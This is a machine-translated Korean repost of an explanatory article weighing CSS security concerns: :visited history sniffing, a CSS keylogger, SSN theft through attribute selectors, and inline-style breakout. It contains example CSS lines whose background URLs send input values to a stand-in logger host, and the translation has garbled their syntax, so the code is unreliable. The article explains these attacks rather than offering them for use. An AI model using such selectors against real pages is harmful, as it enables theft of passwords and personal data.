CSS 보안 취약점-CSS 튜토리얼-php.cn

집

웹 프론트엔드

CSS 튜토리얼

CSS 보안 취약점

Jennifer Aniston

Apr 17, 2025 am 10:02 AM

CSS 보안 취약점

당황하지 말 것! CSS 자체는 주요 보안 위험이 아니며 대부분의 경우 너무 걱정할 필요가 없습니다.

그러나 일부 기사는 잠재적으로 놀랍고 걱정하는 CSS의 특징에 대해 논의 할 것입니다. 요약하자 :

방문한 링크 문제

문제는 다음과 같이 설명됩니다.

웹 사이트에는 간단한 돼지 와 같은 특정 페이지에 대한 링크가 있습니다.
당신은 :visited 을 사용하기 위해 방문한 링크의 색상을 설정하여 a:visited { color: pink; } , 기본 사용자 에이전트 스타일이 아닙니다.
링크의 계산 스타일을 테스트합니다.
색상이 분홍색 인 경우 사용자가 페이지를 방문했음을 의미합니다.
이 정보를 서버에보고하고 그에 따라 특정 조치를 수행합니다 (예 : 보험료 율 증가).

:visited 스타일에는 background-image: url(/data-logger/tickle.php); 페이지를 방문한 사용자 만 요청합니다.

괜찮아요! 브라우저는이 공격을 차단했습니다.

키로거

문제는 다음과 같이 설명됩니다.

페이지에 입력 상자, 아마도 암호 입력 상자가있을 수 있습니다.
입력 상자의 배경 이미지로 레코드 스크립트를 가져 와서 비밀번호 정보를 수집하기 위해 많은 수의 선택기를 추가합니다.

 입력 [value^= "a"] {배경 : url (logger.php? v = a); }

이것은 달성하기가 쉽지 않습니다. 입력 상자의 value 속성은 사용자 입력으로 인해 즉시 변경되지 않습니다. 그러나 React와 같은 프레임 워크에서는 때때로 발생합니다. 따라서 이론적 으로이 CSS Keylogger는이 CSS를 React로 구축 한 로그인 페이지에 추가하면 작동 할 수 있습니다.

그러나이 경우 JavaScript 코드가 페이지에서 실행되었습니다. 이러한 공격의 경우 JavaScript는 CSS보다 훨씬 위험합니다. JavaScript Keylogger는 주요 이벤트를 모니터링하고 몇 줄의 코드로 Ajax를 통해보고합니다.

CSP (Content Security Policy)는 타사 및 XSS가 주입 한 인라인 JavaScript를 차단할 수 있습니다. 물론 CSS를 차단할 수도 있습니다.

데이터 도난

문제는 다음과 같이 설명됩니다.

웹 사이트 페이지에 악의적 인 CSS를 추가 할 수 있다면 로그인합니다 ...
그리고 웹 사이트에는 양식으로 미리 채워진 사회 보장 번호 (SSN)와 같은 민감한 정보가 표시됩니다.
속성 선택기로받을 수 있습니다.

 입력#ssn [value = "123-45-6789"] {배경 : URL (https://secret-site.com/logger.php?ssn=123-45-6789); }

많은 수의 선택기를 사용하면 모든 가능성을 다룰 수 있습니다!

인라인 스타일 블록 문제

이것이 CSS에서 비난 해야하는지 확실하지 않지만 상상해보십시오.

 ... 일부 사용자 생성 콘텐츠 삽입 ...

어쩌면 사용자가 일부 CSS를 사용자 정의 할 수 있습니다. 스타일 태그를 닫고 스크립트 태그를 열고 악의적 인 JavaScript 코드를 작성할 수 있기 때문에 공격 벡터입니다.

확실히 더 있습니다

당신은 그것을 생각 했습니까? 공유하십시오.

저는 CSS 보안 취약점에 대한 두려움 수준에 회의적입니다. 전문가가 아니고 안전이 중요하기 때문에 보안 문제 (특히 타사 문제)를 최고로 정비하고 싶지 않습니다. 그러나 동시에, 나는 CSS가 사고 실험 이외의 공격 벡터가되는 것에 대해 들어 본 적이 없습니다. 제발 가르쳐주세요!

위 내용은 CSS 보안 취약점의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명

본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

관련 기사

릴리스가없는 느낌 : 제정신 배치를 향한 여정Apr 23, 2025 am 09:19 AM

바보처럼 배포하는 것은 배포하는 데 사용하는 도구와 복잡성에 대한 보상과 복잡성이 추가됩니다.

따라서 CSS 프리 프로세서 및 사후 프로세서를 포기하고 싶습니다 ...Apr 23, 2025 am 09:18 AM

네이티브 CSS에 많은 필수 기능이 부족한 시대가 있었기 때문에 개발자는 CSS가 수년에 걸쳐 CSS를 더 쉽게 작성할 수 있도록 모든 종류의 방법을 제시하게되었습니다.

새로운 '웹'준비 보고서Apr 23, 2025 am 09:14 AM

HTML 5 준비성은 무지개를 통해 여러 웹 기능에 대한 브라우저 지원을 보여주는 사이트였습니다. 새 버전은 어떻습니까?

Astro 구성 요소 및 TypeScript로 강력한 DX를 제작합니다Apr 23, 2025 am 09:10 AM

팀 코드를 일관되게 돕기 위해 할 수있는 한 가지는 코딩 중에 특정 구성 요소에 대한 모든 구성 가능한 옵션을 사용할 수 있도록 유형 확인을 제공하는 것입니다. 브라이언

마우스 움직임을 시뮬레이션합니다Apr 22, 2025 am 11:45 AM

라이브 토크 나 수업 중에 대화식 애니메이션을 표시해야한다면 슬라이드와 상호 작용하기가 항상 쉽지 않다는 것을 알 수 있습니다.

Astro Actions 및 Fuse.js로 검색을 전원합니다Apr 22, 2025 am 11:41 AM

Astro를 사용하면 빌드 중에 대부분의 사이트를 생성 할 수 있지만 Fuse.js와 같은 것을 사용하여 검색 기능을 처리 할 수있는 작은 서버 측 코드가 있습니다. 이 데모에서는 퓨즈를 사용하여 개인 "북마크"세트를 검색합니다.

정의되지 않은 : 세 번째 부울 가치Apr 22, 2025 am 11:38 AM

문서가 저장되는 동안 Google 문서에서 볼 수있는 것과 유사한 프로젝트 중 하나에서 알림 메시지를 구현하고 싶었습니다. 다시 말해, a

제 3의 진술의 방어에서Apr 22, 2025 am 11:25 AM

몇 달 전에 나는 해커 뉴스를 썼고 (하나와 마찬가지로) IF 문을 사용하지 않는 것에 대한 (현재 삭제 된) 기사를 가로 질러 달렸습니다. 이 아이디어를 처음 접한다면 (나처럼

See all articles

핫 AI 도구

Video Face Swap

완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!

뜨거운 도구

이 프로젝트는 osdn.net/projects/mingw로 마이그레이션되는 중입니다. 계속해서 그곳에서 우리를 팔로우할 수 있습니다. MinGW: GCC(GNU Compiler Collection)의 기본 Windows 포트로, 기본 Windows 애플리케이션을 구축하기 위한 무료 배포 가능 가져오기 라이브러리 및 헤더 파일로 C99 기능을 지원하는 MSVC 런타임에 대한 확장이 포함되어 있습니다. 모든 MinGW 소프트웨어는 64비트 Windows 플랫폼에서 실행될 수 있습니다.